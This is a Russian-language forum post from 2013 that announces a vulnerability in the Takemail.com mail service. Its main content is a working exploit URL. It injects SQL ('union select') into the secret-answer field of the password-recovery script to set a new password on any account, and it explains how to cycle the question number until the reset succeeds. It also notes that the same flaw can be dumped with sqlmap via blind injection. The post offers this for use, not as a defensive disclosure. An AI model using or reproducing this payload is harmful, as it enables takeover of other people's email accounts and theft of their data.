ICQ - форум. Всё про ICQ.  

Вернуться   ICQ - форум. Всё про ICQ. > Email > Email

Email Все что касается email'ов - вопросы про примаки, баги крупных сервисов, платные и бесплатные мэйл сервисы и другое, что связано с почтой.

 
 
Опции темы Оценить тему
Старый 08.12.2013, 03:13   #1
ГЕЙ НОРК КРЮ ХАКЕРЗ
 
Аватар для psihoz26
 
Регистрация: 15.08.2010
Сообщений: 244

Репутация: 344
Google Talk Jabber M-Агент Bimoid ВКонтакте Facebook Twitter
По умолчанию Уязвимость в Takemail.com позволяющая сменить пароль на любой почте.

Для смены пароля нужно перейти по ссылке ниже предварительно подставив нужные переменные.
Код:
http://takemail.com/takemail/services/recover.cgi?step=1&action=recover&login_recover=[ЛОГИН]%40takemail.com&mail_secretanswer=qwerty'+union+select+1+--+&mail_secretquestion=1&password1=[НОВЫЙ ПАРОЛЬ]&password2=[НОВЫЙ ПАРОЛЬ]
Если вы увидите ошибку говорящую вам о том что не верен ответ на секретный вопрос то вам нужно поменять номер вопроса
Для этого меняем mail_secretquestion=* в ссылке
Всего их 8 (от 1 до 8)



Как многие поняли тут ещё sql иньекция.
Курится через boolean based blind, например скульмапом но оченьмедленно и криво =\

Последний раз редактировалось psihoz26; 08.12.2013 в 05:51.
psihoz26 вне форума  
Плюсанул psihoz26 :
 

Опции темы
Оценка этой теме
Оценка этой теме:

Ваши права в разделе
Вы не можете создавать новые темы
Вы не можете отвечать в темах
Вы не можете прикреплять вложения
Вы не можете редактировать свои сообщения

BB коды Вкл.
Смайлы Вкл.
[IMG] код Вкл.
HTML код Выкл.

Быстрый переход


Часовой пояс GMT +3, время: 01:02.


Перевод: zCarot
Форум Асечников © Asechka.RU

Новости Сочи